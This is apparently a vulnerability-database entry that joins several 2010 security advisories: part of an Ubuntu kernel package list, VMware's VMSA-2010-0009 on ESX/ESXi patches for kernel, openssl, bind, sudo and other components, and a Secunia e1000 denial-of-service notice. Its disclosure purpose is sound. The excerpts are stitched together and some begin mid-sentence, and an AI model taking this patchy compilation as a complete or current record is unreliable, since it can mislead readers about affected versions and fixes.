  Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   210242 78939115c860efacb83481c0687f1a7a
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   131610 dc5625deacbac446e71517f5902376b1
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     5852 f049a9332d469b247e451868b4f22cce
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    27228 0b5b4529d140289e616bded832055cbc
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     8538 9010c080bd63660bf529930565d49f62
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    58830 ae6573a0664b5486360156dd6711776c
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb
  Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   139430 14f825a3334b18614059312527002767
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    70106 6dde178febff58a546142209374e1616
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5:   601506 1b56c59b3df953a640760b876d752465
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5:   600680 166e5056f971d5fa031230c1af67d028
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb
  Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb
  Size/MD5: 20193918 98b3c6e44f8e302cca36530b434e9525
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_sparc.deb
  Size/MD5:   740254 b1a453339b4d68717a445f07b87b53a4
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   266068 1b8caecb838a9dd9b9c765f6603197a3
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   209168 e0e78f6a435e0ca46d5680e08d6e8db0
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    26268 f730be03c2b96e53e779a5d3df4cde93
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   314080 b673ee07d0c907d6ba00a561b915868d
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1675490 8642bd711b6643bd26ddc80674cef9e4
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   222882 136f6b9e24a16823f7309438fd0bd60a
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   121954 75090ea655204cc898db4634fc8aa021
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    38798 a11bcf765626194255c1d5a7d0106c2a
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   100798 af5903bc65fd381528f733fb1ba4100f
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:     8932 ebcb23a73a538276e41fcff9b7bb1d15
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:    62926 7eba529ee44c2e107b693605dcbf1247
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   120960 8f63ad112de0797974650631dee53d13
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:  1217912 87a2a4f21ee86e0f36bc5298a226513b
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   101576 057a15ca3fa891e47216adcf5ae071f7
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   200148 f90834ae24c0f516ef83fa5aa66bafbb
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb
  Size/MD5:   184674 d704744a26941df63b9195288306fa7b

. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1


               VMware Security Advisory

Advisory ID: VMSA-2010-0009 Synopsis: ESXi ntp and ESX Service Console third party updates Issue date: 2010-05-27 Updated on: 2010-05-27 (initial release of advisory) CVE numbers: CVE-2009-2695 CVE-2009-2908 CVE-2009-3228 CVE-2009-3286 CVE-2009-3547 CVE-2009-3613 CVE-2009-3612 CVE-2009-3620 CVE-2009-3621 CVE-2009-3726 CVE-2007-4567 CVE-2009-4536 CVE-2009-4537 CVE-2009-4538 CVE-2006-6304 CVE-2009-2910 CVE-2009-3080 CVE-2009-3556 CVE-2009-3889 CVE-2009-3939 CVE-2009-4020 CVE-2009-4021 CVE-2009-4138 CVE-2009-4141 CVE-2009-4272 CVE-2009-3563 CVE-2009-4355 CVE-2009-2409 CVE-2009-0590 CVE-2009-1377 CVE-2009-1378 CVE-2009-1379 CVE-2009-1386 CVE-2009-1387 CVE-2009-4212 CVE-2009-1384 CVE-2010-0097 CVE-2010-0290 CVE-2009-3736 CVE-2010-0001 CVE-2010-0426 CVE-2010-0427 CVE-2010-0382


  1. Summary

ESXi update for ntp and ESX Console OS (COS) updates for COS kernel, openssl, krb5, gcc, bind, gzip, sudo.

  1. Relevant releases

VMware ESX 4.0.0 without patches ESX400-201005401-SG, ESX400-201005406-SG, ESX400-201005408-SG, ESX400-201005407-SG, ESX400-201005405-SG, ESX400-201005409-SG

  1. Problem Description

a. Service Console update for COS kernel

Updated COS package "kernel" addresses the security issues that are
fixed through versions 2.6.18-164.11.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-2695, CVE-2009-2908, CVE-2009-3228,
CVE-2009-3286, CVE-2009-3547, CVE-2009-3613 to the security issues
fixed in kernel 2.6.18-164.6.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2009-3612, CVE-2009-3620, CVE-2009-3621,
CVE-2009-3726 to the security issues fixed in kernel 2.6.18-164.9.1.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2007-4567, CVE-2009-4536, CVE-2009-4537,
CVE-2009-4538 to the security issues fixed in kernel 2.6.18-164.10.1

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2006-6304, CVE-2009-2910, CVE-2009-3080,
CVE-2009-3556, CVE-2009-3889, CVE-2009-3939, CVE-2009-4020,
CVE-2009-4021, CVE-2009-4138, CVE-2009-4141, and CVE-2009-4272 to
the security issues fixed in kernel 2.6.18-164.11.1.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

b. ESXi userworld update for ntp

The Network Time Protocol (NTP) is used to synchronize the time of
a computer client or server to another server or reference time
source.

A vulnerability in ntpd could allow a remote attacker to cause a
denial of service (CPU and bandwidth consumption) by using
MODE_PRIVATE to send a spoofed (1) request or (2) response packet
that triggers a continuous exchange of MODE_PRIVATE error responses
between two NTP daemons.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3563 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           4.0       ESXi     ESXi400-201005401-SG
ESXi           3.5       ESXi     affected, patch pending

ESX            any       ESX      not applicable

vMA            any       RHEL5    not applicable
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

c. Service Console package openssl updated to 0.9.8e-12.el5_4.1

OpenSSL is a toolkit implementing SSL v2/v3 and TLS protocols with
full-strength cryptography world-wide.

A memory leak in the zlib could allow a remote attacker to cause a
denial of service (memory consumption) via vectors that trigger
incorrect calls to the CRYPTO_cleanup_all_ex_data function.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4355 to this issue.

A vulnerability was discovered which may allow remote attackers to
spoof certificates by using MD2 design flaws to generate a hash
collision in less than brute-force time. NOTE: the scope of this
issue is currently limited because the amount of computation
required is still large.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-2409 to this issue.

This update also includes security fixes that were first addressed
in version openssl-0.9.8e-12.el5.i386.rpm.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the names CVE-2009-0590, CVE-2009-1377, CVE-2009-1378,
CVE-2009-1379, CVE-2009-1386 and CVE-2009-1387 to these issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005401-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending**
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion. ** see VMSA-2010-0004

d. Service Console update for krb5 to 1.6.1-36.el5_4.1 and pam_krb5 to 2.2.14-15.

Kerberos is a network authentication protocol. It is designed to
provide strong authentication for client/server applications by
using secret-key cryptography.

Multiple integer underflows in the AES and RC4 functionality in the
crypto library could allow remote attackers to cause a denial of
service (daemon crash) or possibly execute arbitrary code by
providing ciphertext with a length that is too short to be valid.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-4212 to this issue.

The service console package for pam_krb5 is updated to version
pam_krb5-2.2.14-15. This update fixes a flaw found in pam_krb5. In
some non-default configurations (specifically, where pam_krb5 would
be the first module to prompt for a password), a remote attacker
could use this flaw to recognize valid usernames, which would aid a
dictionary-based password guess attack.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-1384 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005406-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

e. Service Console package bind updated to 9.3.6-4.P1.el5_4.2

BIND (Berkeley Internet Name Daemon) is by far the most widely used
Domain Name System (DNS) software on the Internet.

A vulnerability was discovered which could allow remote attacker to
add the Authenticated Data (AD) flag to a forged NXDOMAIN response
for an existing domain.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0097 to this issue.

A vulnerability was discovered which could allow remote attackers
to conduct DNS cache poisoning attacks by receiving a recursive
client query and sending a response that contains CNAME or DNAME
records, which do not have the intended validation before caching.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0290 to this issue.

A vulnerability was found in the way that bind handles out-of-
bailiwick data accompanying a secure response without re-fetching
from the original source, which could allow remote attackers to
have an unspecified impact via a crafted response.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0382 to this issue.

NOTE: ESX does not use the BIND name service daemon by default.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005408-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

f. Service Console package gcc updated to 3.2.3-60

The GNU Compiler Collection includes front ends for C, C++,
Objective-C, Fortran, Java, and Ada, as well as libraries for these
languages

GNU Libtool's ltdl.c attempts to open .la library files in the
current working directory.  This could allow a local user to gain
privileges via a Trojan horse file.  The GNU C Compiler collection
(gcc) provided in ESX contains a statically linked version of the
vulnerable code, and is being replaced.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2009-3736 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not applicable

ESX            4.0       ESX      ESX400-201005407-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

g. Service Console package gzip update to 1.3.3-15.rhel3

gzip is a software application used for file compression

An integer underflow in gzip's unlzw function on 64-bit platforms
may allow a remote attacker to trigger an array index error
leading to a denial of service (application crash) or possibly
execute arbitrary code via a crafted LZW compressed file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0001 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005405-SG
ESX            3.5       ESX      affected, patch pending
ESX            3.0.3     ESX      affected, patch pending
ESX            2.5.5     ESX      affected, patch pending

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

h. Service Console package sudo updated to 1.6.9p17-6.el5_4

Sudo (su "do") allows a system administrator to delegate authority
to give certain users (or groups of users) the ability to run some
(or all) commands as root or another user while providing an audit
trail of the commands and their arguments.

When a pseudo-command is enabled, sudo permits a match between the
name of the pseudo-command and the name of an executable file in an
arbitrary directory, which allows local users to gain privileges
via a crafted executable file.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0426 to this issue.

When the runas_default option is used, sudo does not properly set
group memberships, which allows local users to gain privileges via
a sudo command.

The Common Vulnerabilities and Exposures Project (cve.mitre.org)
has assigned the name CVE-2010-0427 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.0       ESX      ESX400-201005409-SG
ESX            3.5       ESX      not applicable
ESX            3.0.3     ESX      not applicable
ESX            2.5.5     ESX      not applicable

vMA            4.0       RHEL5    affected, patch pending
  • hosted products are VMware Workstation, Player, ACE, Server, Fusion.

  • Solution

Please review the patch/release notes for your product and version and verify the md5sum of your downloaded file.

ESX 4.0


http://bit.ly/aqTCqn md5sum: ace37cd8d7c6388edcea2798ba8be939 sha1sum: 8fe7312fe74a435e824d879d4f1ff33df25cee78 http://kb.vmware.com/kb/1013127

Note ESX400-201005001 contains the following security bulletins ESX400-201005404-SG (ntp), ESX400-201005405-SG (gzip), ESX400-201005408-SG (bind), ESX400-201005401-SG (kernel, openssl), ESX400-201005406-SG (krb5, pam_krb5), ESX400-201005402-SG (JRE), ESX400-201005403-SG (expat), ESX400-201005409-SG (sudo), ESX400-201005407-SG (gcc).

  1. References

CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2695 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2908 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3228 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3613 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3612 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3621 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3726 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4536 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4537 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4538 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6304 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2910 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3556 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3889 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3939 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4020 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4355 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0590 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1386 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4212 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1384 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0097 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3736 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0001 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0426 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0382


  1. Change log

2010-05-27 VMSA-2010-0009 Initial security advisory after release of patch 06 bulletins for ESX 4.0 on 2010-05-27


  1. Contact

E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce

This Security Advisory is posted to the following lists:

  • security-announce at lists.vmware.com
  • bugtraq at securityfocus.com
  • full-disclosure at lists.grok.org.uk

E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055

VMware Security Center http://www.vmware.com/security

VMware security response policy http://www.vmware.com/support/policies/security_response.html

General support life cycle policy http://www.vmware.com/support/policies/eos.html

VMware Infrastructure support life cycle policy http://www.vmware.com/support/policies/eos_vi.html

Copyright 2010 VMware Inc. All rights reserved.

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (MingW32)

iEYEARECAAYFAkv/V8IACgkQS2KysvBH1xnqNgCcCwwelsQK6DQjcTc2wnIPp0EW E70An2gfkiCQ5FNqvf3y+kNredxyVZwI =JW3s -----END PGP SIGNATURE----- . ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


TITLE: Linux Kernel e1000 Driver Denial of Service Vulnerability

SECUNIA ADVISORY ID: SA35265

VERIFY ADVISORY: http://secunia.com/advisories/35265/

DESCRIPTION: A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an error in the "e1000_clean_rx_irq()" function in drivers/net/e1000/e1000_main.c. This can be exploited to cause a kernel panic via specially crafted network packets sent to an affected system.

SOLUTION: Fixed in the GIT repository. http://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10

PROVIDED AND/OR DISCOVERED BY: Neil Horman

ORIGINAL ADVISORY: http://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. However, given the high frequency at which low-severity security issues are discovered in the kernel and the resource requirements of doing an update, updates for lower priority issues will normally not be released for all kernels at the same time. Rather, they will be released in a staggered or "leap-frog" fashion. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Show details on source website


